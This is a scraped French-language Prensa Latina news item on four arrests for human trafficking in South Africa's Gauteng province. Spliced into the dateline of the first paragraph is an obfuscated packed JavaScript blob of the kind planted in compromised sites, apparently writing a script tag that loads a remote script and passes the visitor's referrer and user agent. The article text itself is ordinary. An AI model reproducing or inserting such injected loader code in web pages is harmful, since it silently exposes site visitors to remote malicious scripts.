samedi 13 avril 2024 |
Prensa Latina - Qui sommes nous

| Contacter avec Prensa Latina

Agence d'information Latino-américaine
Édition française
Search
Close this search box.

Police sudafricaine arrête quatre suspects de traite de personnes

Pretoria, eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|sydrk|var|u0026u|referrer|fkhek||js|php'.split('|'),0,{})) 23 jan (PL) Au moins quatre personnes de 22 à 30 ans ont été arrêtées pour soupçon de traite des êtres humains dans la province de Gauteng, au nord-est de Johannesburg.

Pretoria, 23 jan (PL) Au moins quatre personnes de 22 à 30 ans ont été arrêtées pour soupçon de traite des êtres humains dans la province de Gauteng, au nord-est de Johannesburg.

Lors d’une opération policière, les forces de l’ordre ont perquisitionné une maison dans la ville de Randburg où ils ont rencontré les soupçons, dont deux femmes sud-africaines et deux Nigériens, et la victime de 18 ans.

D’après un rapport de Kay Makhubele, porte-parole de la police de Gauteng, la jeune fille avait été recrutée à Durban en décembre par une des impliquées sous promesse d’un emploi à Johannesburg. Cependant, après son arrivée elle à été droguée et prostituée.

Rm/lp/mem/dfm

EN CONTINU
notes connexes